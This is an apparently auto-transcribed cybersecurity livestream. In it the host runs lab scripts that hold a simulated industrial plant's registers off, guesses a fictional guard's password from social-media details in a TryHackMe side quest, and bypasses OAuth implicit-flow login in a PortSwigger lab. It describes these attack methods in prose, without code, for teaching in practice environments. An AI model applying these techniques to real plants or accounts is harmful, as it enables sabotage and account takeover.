second attack script. So let's run attack move fill 2 or attack stop fill. Okay, when we run this script, let's take a look at what's going on with the... So this is... This is supposed to be stopped, though. Tanawan says, there's always a vuln, though it's just if you can ever find it. Tanawan says, nothing's ever secure. Well, I mean, stuff is secure enough, I suppose. There might be a vulnerability sitting around in your software that you haven't discovered yet, of course. And the more complex the code is, the more likely that is to be. Okay, so attack stop fill. When we stop running it, we should see the factory going back to normal. So this is back to normal. Okay, disable the logic of stop fill. So we got like a couple of them here, right? So there's stop fill and stop fill 2. So the roller steep... Oh, this is... Okay. That's true. If something is simple, it's way easier to secure. Security is a journey, not a destination. Wow. That... It sure is going out of control. Okay. What else do they want us to do? So open the nozzle and stop the roller. So what do they want us to do? Let's see, this one is stop fill. Yeah, we ran this. Repeat the attack in question 1. Abuse the sensor registries. So the attack in question 1 is shut down the plant. What are they calling question 1? Are they talking about this one? Shut down the plant and avoid the plant manager starting it again. So make sure that you can't restart the plant. So this one is going to be the attack shutdown, or attack shutdown 2 maybe? So if we run regular attack shutdown, this shuts down the plant. Nothing's moving, right? Okay, Shiraj asks one question. I don't understand your English, Shiraj. What do you mean by by frequency a device can be hacked? The code guy says Cola is going to be Sprite. Okay, so let's see if we can actually restart the factory. So if we press escape. Okay, so this restarts the factory. Is it? Oh, it doesn't really restart though. So, Siraj, are you asking how frequently are devices able to be hacked? That's... I don't know if I can really answer that question. Like, devices that are vulnerable can be hacked? Does that mean that all devices can be hacked? Not really. Can this be used? So, Nana Ya, hello, nice to see you here. Can this be used on real-life plants? Well, I mean, we're assuming that that the real-life factories are using these same kind of controls, and if they are using these same kind of controls and they're not being secured, then the answer is yes. What's the challenge? Do we need to stop the filling? We need to stop the ability for the plant to be restarted. So I'm pretty sure that this is just running a while loop. So if we take a look at this script, it's just like a while loop that keeps the registry off. So while true, write register 0, stop the motor, stop the nozzle, shut down the plant. So this is just a while loop that keeps everything off while the script's running. Okay, Code Guy says, let's see, Tatted One says, they're asking you to do the scripts manually, maybe? Well, I mean, we would basically write the same script, but it's understanding how the scripts are working, I suppose, is what we're trying to do. Okay, Nanaya, Emmanuel, hey, yeah, if you find value in the stuff that I'm putting out on YouTube, then the stuff on YouTube and on Twitch, then I'm happy about that. So they're just, yeah, I think we do need to understand what the registries are doing, or the consequences of like doing like a while loop that keeps the register in the same state. Okay, so now the thing has started back up. So they're repeating the attack in question 1, abusing sensor registries. So the first attack was shut down the plant. And thank you very much to Polar Friend for following on Twitch. Thank you. Okay. I didn't know they were on YouTube. I've been following on Twitch. Yeah, I mean, we're live on both YouTube and Twitch at the same time. So let's run... What's the difference between attack shutdown 1 and 2? Okay, so this one keeps all of the registries at 0, and the first one only keeps 3 of the registries at 0. Okay, so let's try running the second script. Mr. Gray asks, if people want to learn how to hack, I'd recommend learning some Python. In fact, I think everybody who uses Linux should learn a tad. I mean, if you're really interested in Linux stuff, I think learning Python's a pretty good thing to do, because Python's very, very common. Very, very common inside of Linux environments. And let's see what's happening here. So nothing's moving. Nothing's moving, and I don't think we can even restart from this point. So if you restart, nothing moves either. Oh wait, it does move. But the script's still running, right? Yeah. So attack shutdown 2, it should still be working here. All right, so this keeps the factory at a standstill, kind of. It is trying to restart. Okay, and Rabe, hello, nice to see you here. Is AI required for high expertise level in security? maybe, well, I mean, maybe in the future, but the thing is that security was a thing before AI, and AI has only been a thing for like 3 years now. So if you think about it, like AI hasn't been around for a long time. I think the first AI models, like first LLM models, were deployed to the public. It was like 2023. I could be wrong, it could have been a little bit earlier than that, but LLMs have not been a thing for a really long time. And we need to wait like a good number of years to actually figure out where these are going to go. Because it's still like super early. Okay, so repeat the attack in question 1, abusing sensor registries. Okay, did it. Repeat the attack in question 2, abusing sensor registries. So question 2 is start the plant and open the file. Open the nozzles while the bottles are moving. So the bottle, I guess it's attack move number 2. Attack move fill number 2. So run the attack on Okay, Mr. Gray says, nice stream, glad I stumbled across your channel. Well, thank you very much, Mr. Gray. And what if you run both at once? Well, okay, so moving and filling, it basically means that all of the stuff is on, like, at the same time, I'm pretty sure. Let's see what's going on here. Okay, so... yeah, it's actually only moving while... Let's see, it fills it up. It waits for a little bit before it gets to the sensor here. Okay. Repeat the attack in question 2, abusing the sensor registries. We did that. Repeat the attack in question 3, abusing the sensor registries. So that's going to be... Start the plant, open the nozzle, and stop the roller. Open the nozzle, stop the roller. Open the nozzle while the bottles are rolling. Those plant workers are... Hopefully it's not bleach. Well, I mean, I think it's supposed to be water. I'm not completely sure. So the last one... Let's take a look at... Actually, let's do attack stop fill. So attack stop fill 2. So bottle is not filled. So it's going to count as not filled. Bottle is under the nozzle, which means it's going to be running. The roller is not going to be going. And so it's just going to stay in one place and try to fill. Well, it's just going to keep on filling up the liquid. Right? So let's run attack stop fill 2. Okay, and let's see what happens. You know, the funny thing is that it doesn't stay completely still. Sarar says, what should I learn, Python or programming language? Is it enough to learn, or is it better to learn assembly language? So Siraj, you don't necessarily need to learn assembly language unless you want to do like a specific specialty of cybersecurity. Let's talk about this. So this is like another very common question that people have. So it's like cybersecurity and programming. So it really depends on your job role. Python, well, learning Python basics is probably like, it's recommended for most roles in cybersecurity. But if you want to, so for reverse engineers and so for like low-level roles, you definitely want to learn stuff like C, x86 assembly. You want to learn C++. Basically, whatever language you want to develop in and reverse engineer, you have to learn those languages, along with like low-level languages like assembly. But for other roles, it really depends on how, like, you know, how deep you want to get into it. If you want to do like web app hacking, you probably want to learn like web languages like JavaScript, PHP, definitely the basics of like HTML, CSS, stuff like that. Game hacking, C#, right? C# for, oh gosh, the stuff that's written using, was it Unity? What is the name of that language, or of that of the framework? I don't remember. Oh man. Well, that factory's messed up. Anyways, let's go back. So that's done. All right. So this is attacking ICS plant number 1 finished. And we can move on to the next, well, the next part of the stream. Okay, let's go back. So I think we don't need to use our Python scripts anymore. We can shut down the virtual environment. I think it's the deactivate command. Deactivate. Okay, so that shuts down our Python environment. And I think I can get rid of these Python scripts too. Okay. Let's move on. So this last portion is going to go for about 2 hours. Maybe a little bit longer than 2 hours, since we finished up a little bit early. But I'll put 2 hours on the clock first. We're going to be doing some hacking against some extra challenges from the Christmas event. So the Christmas event was from TryHackMe over here. We're going to keep on working on this room. We started it last stream. Okay, so I really like the visual representations of what's going on here. It is really fun. Anyways, virtual plant. If you're interested in downloading and trying the stuff out for yourself, here's the GitHub repository. There you go. Okay, so we're going to talk about what we've already discovered on this in this room. This is TryHackMe Advent of Cyber 2025. And this is Side Quest 1. Here are our notes. Mr. Gray says, could completions of these labs be used on a job resume or some sort of portfolio for potential jobs? That's a good question. So, I mean, completing modules on education platforms like TryHackMe, they are useful. I think what you want to do is, it's not you don't want to record like every individual room that you finish on one of these platforms. So if you're talking about like TryHackMe has a bunch of like learning paths. More than the learning paths, I think what you want to do is you want to eventually move towards the certifications that they offer over at TryHackMe. They've got a couple of them. So for example, TryHackMe has, I think it's called the PT1. Yeah, so Junior Penetration Tester 1. So more than just like completing individual rooms, you probably want to put like certifications on your resume. More than just saying that I completed one module or another module on TryHackMe, because there's way too many of those to keep track of. So aim for like the bigger things. Okay, Shra says, I want to be elite in hacking and cybersecurity. And it's a noble goal. It's going to take a long time. Thank you very much for following Loop in Bash. Thank you. But and if you want to take a look at, you know, like what this particular certification looks like, I'll leave the link. But let's see. So we're going to be working on this for the next couple hours. And let me switch up my topic. So topic 3 is done. Topic 4 is here. And let me activate my TryHackMe. Yeah, so the TryHackMe VPN access is still here. And we're currently working on this room. So we need to activate the virtual machine. In task 1, start up the target machine. So there's like 5 parts to this room, and we've solved the first part. So the first part is part 1. We used a fake Facebook-like social media page to get information about a certain guard, and then we took the details that the guard was leaving in the social media posts to hack the guard's password. So after we do that, well, we have to do part 2. So we're going to be doing part 2. But of course, before we do part 2, we need to start up the machine. We need to wait for about 30 seconds before the machine comes back online. So the first thing, I think the first thing we need to do is we need to access the web page. So I just need to get that IP address. Okay, IP address is here. Copy it. And then we'll go over to the room. We need to access it on port 21337. Cannot connect. Let's try that one more time. That's weird. Let me see. Well, I mean, it could be that we're just going too fast. We should be connected to the TryHackMe network. I'm going to do a quick ping scan, or like just a quick ping, to make sure that we can access the IP address. So we can access the IP address. And thank you very much for following, Suraj. Thank you. Okay. Let's try loading up this page again. Okay, so it's up. For each one of these side quest rooms, you need to put in like a special code to unlock all the services. So in this case, it's like, now you see me. Okay. And now we can access the room. So we were stuck on part 2. So you now take control of Hopper with one ultimate goal: free yourself from the wrongful imprisonment. You must follow Hopper's 5-step escape plan. So the first step is to unlock Hopper's cell. So I'll walk through what we did before. So over here, we did a little Nmap scan. So the Nmap scan lets us know which ports and services are available on this server, like port 22, port 8080, port 80. I cataloged what all the services are inside of our GitHub walkthrough over here, and the first thing we did was the accessed the application on port 8000. So the one on 8000 is a fake Facebook page. So this one is called Fakebook. We just need to make an account. So I'll just make an account real quick. Test at HackerFrogs.com. Yes. So name is the Shy Hat. That's me. Password is, well, we need to make it strong. You must type the password each time. Oh, really? Okay, and then type the password again. We sign up, and then we get access to the social media posts. So the social media posts that, well, one thing about social media posts is that you can get a lot of information about targets through social media. And in this case, we're targeting this user right here named Guard Hopkins. So they leave all sorts of juicy information, such as the fact that they love to order takeout. They've got a dog named Johnny Boy in this post here. They say, what else? Over here it says, did you know that if you enter your password as a comment in the post, it appears as stars? So here we say that the Guard Hopkins user, put in their actual password. Is this an OSINT challenge? Part of it is OSINT, and this part was OSINT. This is we put together a little list that we could do a brute force attack with from the information here. So the dog's name, the fact that they like to, this is a pattern for their password, like pizza, maybe $123$4 and this person also talks about their birth year, 1982. A lot of people use their birth year in their passwords and their usernames, so it is something you need to keep track of. So I think we found the password for the user. Hold on, let me log out. We also got like an email address. So the email address, where is it? So his email address is this one, guardhopkins@HompSecAsylum. I wonder if we can get into his Fakebook page. So I think the password was actually like Johnny Boy 1982 exclamation point. Okay, that was not it. But so this would be an example of like password reuse, and I think the actual application we want to access is on port like 8080. Lol, nice rage bait. He put in the actual password. Okay, so this is the email address right here that we need to use for the login, and the password Johnny Boy 1982 exclamation point. Okay, so we get into the guard login here, and then we can unlock the cell. What we need to do is we need to eventually free the captive bunny guy, and we click on this one over here. So unlock cell door, and then we get a flag that we can, I'm not too sure if we're using the flag later on, but it's one of the things we use to prove that we completed the challenge. Unlock psychos, of course. And there was a bunch of other, there's like one other thing that we could take a look at as well. Okay, so we've got, so facility video portal, this is going to be on port 13,400, so 13400. So let's go ahead and take a look at that. So 13400. So this is another like login, and we can use the same login that we used before for Guard Hopkins. What was his email address again? Here. And the password is Johnny Boy 1982 exclamation point. Okay. So we got a So these are supposed to be like video feeds. So guard, lobby, supply loading dock, cell block. Whoa, what is that? What was that? Okay, Psych board exit, so it admin restricted. You've been gestured. You've been gestured. Are we supposed to do something with this? I mean, I guess we could full screen this. Oh, no. We can put it in, what was it? Nice. Alright, well. Okay, so the other feeds don't show us anything. Code guy says, see, one small mistake could lead the attacker into releasing. Yeah. Let's see. Sarah says, should I use RFID proof covers for the laptop while traveling? I mean, I'm not that paranoid about stuff like that, but So the cell block, so loading. Oh, so all of these have been replaced. Thantos says, are there any good alternatives for EchoCTF? I don't think so. EchoCTF is it's pretty standard. I don't know if there's anything else that really gives you EXIF information. So EchoCTF, what's your, I mean, what is the issue that you're having with EchoCTF that you don't want to use it? Thank you very much, Jonathan Quintero. Thank you. Code guy says, I think there's somebody already in the system before you. Well, I mean, we're trying to help this guy escape, right? That's our mission. Okay, with the cell unlocked, head straight into the lobby. This area connects the different blocks of the facility. Cameras are active, so stay alert. Your objective is to reach the psych ward entrance at the east side of the lobby. So let's go back in here. So the lobby is here. So are these all... Yeah, these have all... They all have the same stuff. So the lobby and the supply loading dock is the same thing, and the cell block is the same thing. And the psych ward exit we can't access. It says access restricted. You do not have permission to view this feed. So we just need to figure out how to access this thing. So psych ward exit. We might have like a cookie or something that that tells us what our permissions are. So we can go over to the web browser. Web browser, then what was it? Web browser, more tools, web developer tools. So we got hopsec session. So hopsec session, this probably tells us whether or not we're the administrator or not. Inspect maybe? Maybe. We also have messages. So what are these messages here? Let's just copy the entire value of this message. You have signed out? Let's print it out. So we got JSON message successfully signed in as the Shy Hat. Oh, okay, okay. This is something for the other application. Or at least I think it is. So the entry points are only only the ports are the credentials. No, I'm not completely sure about that. Let's see. So HopSec security, we got our CSRF token. There's nothing else being stored over here, I don't think. So Psych ward exit, admin restricted. Don't have permission to view the feed. So the other thing what we can do if we're trying to inspect some web traffic is we could use a very specialized tool called Burp Suite that can record all the traffic, and then we can inspect it more thoroughly. Burp Suite is a very common tool used in web app security. It's basically every professional who does web app stuff uses Burp Suite. So inside of Burp Suite, we can open up the browser, and then we can take a look at the website through the browser. Okay, Thanto says, I want to know if XFTool can modify the metadata. I want to delete some metadata for privacy. You want to know? Yeah, I'm pretty sure XFTool can modify metadata. It's not something I do very often, but I think I've done it once or twice for CTF challenges. So if you Google it, or if you like ask the AI, it should be able to let you know how to do that. So the email is Gard Hopkins, password. Okay, let's log in. So we start clicking around on these buttons. So it says signal lost. Yeah, the funny thing is that we get signal lost on when we're using Burp Suite. Access restricted. Okay, so we can take a look at what was recorded over here. So V1 streams request. Oh, interesting. So this is an API endpoint. So we got auth login. So the API endpoint is also used to access the cameras. We don't see it. We don't see it in here. This is done like behind the scenes. Kogai says, I need a free VPN, an Indonesian VPN. VPN doesn't have the Indonesian one. I mean, have you tried Proton VPN? They've got a pretty good free VPN service. Servers in 120 countries. You can give this a try. Okay, let's take a look at the requests. So we've got this here. It says, let's see, bearer sub Gard Hopkins role guard. So we could potentially do some camera ID cam lobby tier guard. So how many different camera IDs are there? So this is cell block, this is loading supply dock, this is lobby, and then we've got the restricted one for psych ward exit. Proton is paid. They've got they have a free one. There's a free tier for Proton VPN. Okay, FH says, I was thinking, don't the other ports provide more information about the target? Yeah. I mean, I recorded a bunch of stuff over here. There's a bunch of open ports, of course. We need to figure out which order we need to go in to get the job done. We've already explored like port 8000. Port 80 and port 8080 are about the same. And then there's the camera feed we're looking at here on port 1340. But there's also like ports open on 401, 402, and 403. I'm not too sure what those... Not completely sure what those are. But if we go in to Burp Suite over here, let's see, cam lobby, we've got cam parking, cam loading. So cam loading, cam parking. Let's see if we can give one for cam psych ward exit. So we can put this request in the repeater, and then we can start messing around with these web requests. So the 13403 is very suspicious. Let's take a look. 403 is, yeah, unknown. So when we did our scan with Nmap, it wasn't able to figure out what the heck it was. But I want to keep on working on this for a little bit. So the repeater's here. We can start messing around with this information and send some different stuff. So let's just try something that doesn't exist. Cam washroom. Send that. It gives you something. So it gives you a 200 OK. It doesn't necessarily do anything. So allow control. Access control allowed methods, get post options. So this lets you know how to interact with the API. So the server is running on WorkZug, so it's a Python server. Or, tier is admin. So effective tier guard, we could also start making, well, setting guard to admin. And we do cam. We're trying to access the exit. So let's see if cam exit exists. So it still gives you effective tier guard. That might be connected to your auth token. So the authorization bearer sub guard Hopkins, etc., role guard. We might be able to mess around with this. So this is like a category of attacks that you can learn about over at Portswigger. So let's see. Oh, we need to log in. So I remember, man, the last time I took a look at like authorized OAuth attacks was like 3 years ago. Okay, so let's take a look at the. So all the learning materials. This is for OAuth 2.0 authentication vulnerabilities. Okay, so like OAuth 2.0 is it's a very popular way of logging people into sessions. So I need to figure out if this is the correct thing I should be looking at first. So unlock Hopper's cell, we did this. So he's locked inside. Door is secured with a digital lock. We unlock the door. We're on step 2 right now. So head straight into the lobby. This area connects the different blocks of the facility. Cameras are active, so that's why I started taking a look at the cameras. So your objective is to reach the Psych ward entrance on the east side of the lobby. So lobby is here. Psych ward is here. This is the... We started here in the cell block. We moved into the lobby. The next place we need to go is here. The Psych ward exit. Let me go back to the... Let's try going back to the application on port 8080. Okay, and then we need to put in our credentials again. Okay, we've got our cameras, and we've got our, well, unlock the cell door, and then let's see if we can access the cameras. So camera feed 1 is currently unavailable, so I guess we can't look at any of these cameras. So lobby, cell block, psych ward exit. So the psych ward exit and the main corridor, I mean the main corridor is the last thing we need to access, because that's the one that's actually going to let us escape. The psych ward exit also has like a key code, but I'm not too sure if the key code is like only numbers, or if it's going to be like a combination of numbers and letters. Probably need to get it somewhere else. So the first thing we need to do is we need to get into the psych ward. Okay, let's go back to Burp Suite to see if there's anything interesting there. So let's see, get key, check session. So CGI bin is another directory that we can access. There's sessioncheck.sh and there's login.sh. Enes Adres, hello, nice to see you here. Quick question, yeah, I'm here to answer questions. So door equals key flag.sh, door equals hopper. So this is how we got the flag for the previous thing. So what do we want to try next? So cam lobby tier guard. We get the stream over here. Yeah, this one actually gets, we can actually see the camera feeds in the regular browser, but not the one for Burp Suite. Not sure why. So it says guard console here. If we could upgrade our access. Access restricted. Okay, Thantos says, thanks for the suggestion. Autopsy might be a good alternative. Autopsy might be a good alternative for EXIF tool on digital forensics. Gesture cell block. So I wonder what the name of this is called cell block. This is called supply loading dock. This one's called psych ward exit. So is it ward exit? So this is the V1 streams request. I wonder if we can just manually navigate to this. So over here, V1. Okay, so this just makes you log in. I mean, we're already logged in. Why is it asking us to log in again? Let's try that one more time. So this is main.js. So this is a JavaScript page. So there's also v1 streams. This also redirects you. So v1 streams add something something. There's also like a streams/request. So I guess each time you access this thing, you need to include your authorization bearer token. But we've got this already. Or at least I think we do. Let's do a quick check. Where's our developer tools? And then sources? No. Application cookies? Yeah. So I mean, this is different. It's a different cookie. So hapsec session. This is some hexadecimal encoded value. Go back in here. Also have v1 cameras and v1 auth login. This is our password that we provided, of course. This gave us a... Oh, interesting. So this gave us all of the information. Yeah, so here's the thing about the login function. We might be able to trick the application by giving like additional information. We're talking about over here. It's been such a I mean, I've tried doing stuff like this a long time ago, but let's try working through the labs so that we can understand how these work. So this OAUTH, this lab uses an OAuth service that allows users to log in with their social media account. Flawed validation by the client application makes it possible for an attacker to log in using other accounts without knowing their password. So to solve the log into Carlos's account and then log in with your own social media account using this. Okay. Just for fun, we're going on all sorts of tangents over here. We're going to try solving some of these labs that they might help us understand what the vulnerability is on in the other room. Okay, so we go to, let's load this up in the Burp Suite browser. And let's try accessing our account over here. We're redirecting you to log in with social media, okay? So we need to put in a username or password, email or password. What is our... You can log in with your own social media account using the following credentials: Wiener and Peter. Okay. So Wiener, Peter. So We Like to Blog is requesting access to profile and email. Continue. Okay, now we should be logged in. Your email is wiener@hotdog.com. Of course, of course. Let's go back and see what that actually looked like in Burp Suite. Okay, so ID my account, ID equals Wiener. What did our request look like? So this is just a GET request. So there's also the post request over to the authenticate endpoint. And we need to give like, okay, so email equals wiener@hotdog.com. We can try to log in as another user. So let's put this in the repeater, and we'll try to authenticate as the Carlos user. So we'll just replace Wiener with Carlos, and Carlos's email we can get from over here. carlosmontoya.net. Okay, and then send this. It says found, and let's, well, what are we going to do? We're going to request in browser in original session, copy that, and then go back to the burp browser, paste this in here. Okay, and we solved the lab. So we were able to log in as another user. And we might be able to do the same thing in our current situation over at the other lab here. So we made like a request to like an authenticate web like endpoint over here as well, right? So it's like post to login.sh. But we need to make sure that it's for the correct. So options, we got post to login, username and password. Well, I mean, we have to supply our password here. But we don't have the password for any other users. For example, like the admin user. We got our options. Post request, cam loading tier guard. So we don't have our token yet. So at what point are we assigned our token? Okay, so we've got our token here. So it's probably going to be the response. So v1 auth login, that gives us our token. Yeah. So username is Guard Hopkins, token is here. I don't think we're going to be able to hijack a session that easily. Okay, let's go back to the TryHackMe page. So I don't think there are any hints here, unfortunately. I wish I knew what the. So move through the lobby, bypass the Psych ward keypad. So we're on step 2. So we unlocked Hopper's cell. We're moving through the lobby. We need to deal with the cameras. The other thing we could do is we could access the other ports. This is done. So this is the application on port 8080. This is the application on port 13400. We can just try the ones on like 401 to 404. So 401 is not found. 402 is Nginx, but we don't know what Nginx. This is just like a default page. 403 is also not found, and 404 is unauthorized. So we need to send some sort of additional information here to be authorized. So If there's an API v1, there might be an API v2. There is an API v2. That's really weird. So there's, are we using the same session? API v2. Okay, let's go back. One, 3, 4, 0, 0. Let's try the v2 endpoint. So v2 endpoint, you don't have permission. Okay, what about the guard one? So this is going to give us our same, yeah, this stuff over here. Service bay and cages. Same thing, right? Yeah. The lobby is the same thing. The other thing I wonder about this is what the code looks like. So hls.min.js, sure. Signal lost, access restricted. Main.js. So we can take a look at this JavaScript here to see if there's any special security stuff in here. I don't think there is. It's looking for role equals admin to give it access to it. So admin console, there's an admin console and there's a guard console. So this is the guard console. It's funny how you can type in like V2 or V3. Oh, you know what? It doesn't matter what you type in here. Okay, okay. But this will redirect you to a login page. Mm-hmm. So what were the other ports that we enumerated? So it's 401, 402, 403, 404, and then we've got the 21337. There's also port 9001, but we don't know what the heck that is. Port 80, 9001. Okay, this doesn't lead us anywhere. Asylum Gate Control System. SCADA. Oh, it's a SCADA terminal. That's funny. We were just talking about SCADA today. Provide authorization token from part 1 to proceed. Enter authorization token. Access denied. That's really funny. So SCADA terminal version 2.1. Okay, let's add this to the notes. We can edit this. So 9001 is actually the Asylum gate control, and this is a SCADA system. Okay. So we got the lobby area, the psych ward area, the main corridor area, and then unlocking the facility door. Let's go back to the main area over here. So the main area is port 8080. Oh, this is view source. Don't want to view source. Okay, we've done this. So the camera feeds are not available. They're just not available in general, huh? Yeah, so it always says camera feeds are not available. So this, So Asylum, oh, okay. So SCADA unlock door passcode. Yeah, we're not at this point yet. We also have the Psych ward exit. I wonder what we're supposed to do in this case. Are we supposed to brute force this? Nothing. We brute forced already. We did brute force for the guard's password. Psych ward. Something tells me that we need to go back to here. Shin BDR, hello, nice to see you here. What is up? Shin BDR, you're from Nepal, right? I think there was another guy in YouTube chat who was really who was also from Nepal and wanted to get into cybersecurity stuff. I think his name was like Siraj or something. Anyways, if he's still in YouTube chat, I'm sure he'll pipe up sometime. Anyways, what were we doing? So this stuff over here, yeah, this is all signal lost. Okay, so FH says, I think a quick SQL on one of those login pages would be a good move. I mean, it's tough to say. Yeah, I'll point him out if he shows up again, Shen, yeah, for sure. So SQL, like SQL injection, I'm not too sure if we're supposed to be doing that on the application here. Although I suppose we could try it here. So they're looking for like a key. We could do like single quotes or double quotes to see if we can invalid code. Invalid code, yeah. No dice here. So after we unlock these cell doors, as an authenticated user, you can remotely unlock patient cell doors. So the other thing that could be at play here is we could be trying to bypass the OAUTH version 2. Let's try investigating that a little bit more. So he's already solved a lab here. Authentication bypass via OAuth implicit flow. So maybe that's not it, but we've got a bunch of other OAuth stuff here. So how do OAuth authentication vulnerabilities rise? So identifying OAuth authentication, usually whenever you see types of tokens, you can tell it is OAuth over here. For example, authorization bearer something, that's usually a very strong indication that they're dealing with the OAuth as their method of authentication. go back. So recon, during some basic recon of the OAuth service, it can point you in the right direction when it comes to identifying vulnerabilities. So well-known OAuth authentication server. Vulnerabilities can arise in the client's implementation of OAuth as well as the configuration of the OAuth service itself. Okay, ShinBDR. Yeah, I saw CyberNerd Dante here earlier as well. And Batosai Himura, thank you very much for subscribing on YouTube. Much appreciated, thank you. Okay, so flawed CSRF protection, improper implementation of implicit grant types. We might be looking at this. So implicit grant types. Let me search for this. So here, okay, so improper implementation of implicit grant types. Due to the danger introduced by sending access token via the browser, the implicit grant type is mainly recommended for single-page applications. However, it is often used in the classic client-server web applications due to its relative simplicity. Okay, so to solve this problem, the client application will often submit this data to a server in a post request and then assign the user a session cookie, effectively logging them in. This request is roughly equivalent to the form submission request. Joe Smith, thank you very much for subscribing on YouTube. Much appreciated, thank you. To solve this problem, the client application, okay, and then in this scenario, the server does not have any secrets or passwords to compare with the submitted data, which means that it is implicitly trusted. In this implicit flow, the post request is exposed to attackers via their browser, and as a result, this behavior can lead to a serious vulnerability if the client application doesn't properly check the access token matches the other data in the request. So in this case, an attacker can simply change the parameters sent to the server to impersonate any user. Oh, we just solved this one. I mean, I solved this one before. Wait, did we just solve this one? I don't think we did. I don't think we did. Okay, let's go back. Oh, we did just solve this one. So this is the implicit flow. Okay, so what else is there? So flawed CSRF protection, forced OAuth profile linking, OAuth account hijacking via redirect URL, stealing OAuth access tokens via an open redirect. Okay, so what were all of the different ones here? Flawed CSR for protection, vulnerabilities in the OAuth service, leaking auth codes and access tokens. The most infamous OAuth-based vulnerability is the configuration of the OAuth service itself. Yeah, I'm not too sure if this is the way we want to go. Let's take a look. So the way we're logged in is over here. We send options to v1 auth login. Let's see. Access control allow headers. So authorization, content type, and range. So the methods that are allowed are get, post, and options. Then we make a post request. Oh, can we change? Can we change this? Hold on, let's send this to the repeater. That was the never mind, that was the response. Okay, so this is the response. It gives us all this stuff. The request portion is just our username and password. Wait. Yeah, same thing. Maybe we can change our username to something else. So we're doing OAuth. I mean, we've got OAuth is being used by the application, but I'm not sure if this is the thing that we're supposed to abuse. I haven't done any OAuth vulnerabilities in like 3 years, but I guess we can try it out. So we'll try sending different information. So instead of guard Hopkins, maybe we could try it like administrator or like admin. Maybe it'll give us like wrong password or something, bad credentials. So these are bad credentials. But if we send the correct credentials, then it's going to give us our OAuth token. So facility profile. I don't think we can we modify these somehow? So this becomes our like bearer token. Proxy. Yeah, in the subsequent requests. We receive this bearer token. Can we modify this directly? Can we spoof a token? Let's go in. OAuth spoof token. So OAuth spoofing generally refers to various attack techniques which use to steal or abuse valid OAuth tokens to gain unauthorized access. Okay, is the Python server insecure? I mean, I'm not sure whether or not the Python server is insecure or not. We know that it's everything. I think everything is being deployed on Python. Well, most of it is on Python. I think I spotted one server that was Nginx. These two are Nginx. This one is Python. So this is Python. This is Python. The main one here is Nginx. This one here, I'm pretty sure, has been exhausted. We can't really use it anymore. Or I don't think there's anything on that particular port now that we've put in the password to actually access the thing. Simple HTTP server 0.6. I guess I can do a bit of research on that. Simple HTTP server doesn't show up. Yeah. Maybe WorkZug? So WorkZug, well, I mean, debug shells. Huh. Maybe, I mean, I can take a look at this thing a little bit. Okay. Locate this thing. Okay, and we'll just copy it over. Is there replay? Yeah, there's replay for sure. If you want to go back in the video. That's totally fine. So just going to copy this thing over here. Okay, so what is this thing supposed to do? So use the Python script, specify the IP address and the port number. So debug is not enabled. So what does this thing want to do? So if it's successful, this script is going to give you a reverse shell. At least that's the way I think it. Okay, Mumbles Justin says, please stop calling it SCADA. In the 30 years in automation industry, I've never heard it pronounced like that. It's pronounced SCADA. Mumbles Justin, hey, hello, nice to see you here. Well, I mean, it sounds like you're very passionate about this topic. I mean, I'm sure the difference between SCADA and SCADA is the same difference between SQL and SQL and SQL. I hope you don't take too much offense. Okay, so FH says, if RCE doesn't work, path traversal is already a lot. I mean, I'm pretty sure this is not the way we're supposed to be doing this challenge. This is supposed to be... I'm pretty sure we're not supposed to actually break into the server. Because there's like 5 parts to this. So it's very unlikely we're gonna have to get direct access to the server like this. Let me go back. I need to update my time. Okay. So there's 1 flag, there's 2 flags, there's 3 flags. So there's 3 flags eventually. But I'll try to pronounce it SCADA as much as I can, Justin. Just, you know, just to not offend anybody. So the camera is here. We got our requests. Get, post, and options. So effective tier guard, ticket ID. Anytime you make a request to this thing, it's going to give you a temporary ticket, which you can use to do your thing. So the headers it's looking for is content type and range. If we make our post request, we can also include data. What's the best way to learn from your live streams as a beginner? How can you practice and get the most benefit from these kind of streams? So usually on my live streams, I'm doing some sort of demonstration. So it's usually going to be during the 2nd hour of the live stream. The demonstrations eventually get turned into YouTube videos. Look out for those. The other thing you could do is you could take a look at the stuff that I'm putting out on the YouTube channel as the short form content. So over here, I publish a bunch of videos. So aside from the live streams, so each one of these videos, they're usually, well, depending on like how bite-sized you want your education over here. For example, we got some for EchoCTF, stuff for all of Cyber, stuff for Hack My VM. Take a look at the challenges over here. I usually try to take my time to explain what's going on, especially for beginners. Of course, there's some topics that are not super beginner friendly, like stuff like binary hacking is not super beginner friendly, nor is reverse engineering, but most of the web stuff is going to be accessible for beginners. We've also have our Advent of Cyber stuff over here. It's not super beginner friendly, but what I would do is I would look through the YouTube channel over here, take a look at the videos for EchoCTF in particular, and there's a lot of good beginner friendly stuff over there. Okay, so we got grant types. So OAUTH grant types, they've got, and there's scopes. So scopes, contacts, read, grant types. So we got tokens, and we got authorization. So I think we're dealing with, we've got tokens over here as well. Oh, we got tickets. So we send our bearer token over here. So cam ID, cam loading. I suppose, I think we can send whatever we want in these requests. So if we just, you know, do camera ID random, it's still gonna send it like a, yeah, it'll still send us a response. Not necessarily what we want though. Even if we modify our tier in the post request here to make ourselves like an admin, it doesn't really respond to it. Thank you very much, Psychosocial. Psychosocial, hello, nice to see you here. Welcome to the stream. Let's give you a fun... I haven't done too many of these video redeems today. How about some Hack the Planet?
Hack the planet! Hack the planet! Shut up again!
So post get options. Can we do... I really wish we could enumerate this API. Yeah. This one is admin restricted. The other thing is like the original web pages are like port 80. See if I can pull those up. Port 80 is the access terminal. Port 80. I mean, what's the difference between this one and the one on port 8080? They look... Well, okay, we're not authenticated on this one. Support 80. We'll see if there's any really big difference. This just gives us a not found, so I guess it's not possible to log in on this on this port. Not found. Okay. I suppose if I wanted to do more authentication, I could try doing some fuzzing, authenticated fuzzing, or authenticated directory busting. Let me see if I can do that. So here, this is 9001. We got our session check for 8080. We've got our cameras. We have our actual cookie here. Okay, let's turn this into copy for curl. And we'll go back here. We got all this information. Dr. Robot AI says you're welcome. Thank you, Dr. Robot AI. I'm not too sure what we're saying thank you for, but hello, nice to see you here. So HopSec session is over here as our cookie. I think we just want to copy this. And we'll try giving this to FFUF or GoBuster. So we got GoBuster. We have a cookie. Let's just plug in 13 this number. What's our IP address? There we go. Okay, so this is directory busting mode. We're looking for... Let's just look for valid directories first. Okay, invalid string given. How do you do GoBuster with cookies again? GoBuster cookies. Authenticated directory scans with GoBuster cookies. Okay, let's look it up. Cookie. Okay, look for the set cookie header. So it's dash dash. Oh, it's not dash dash cookie, is it? So GoBuster. Use the C flag to provide the session cookie. Okay. Jody Breeze, hello, nice to see you here. Any tips for fuzzing? Any tips for fuzzing? What are you fuzzing? I mean, I would say what you want to do is you want to follow tutorials that 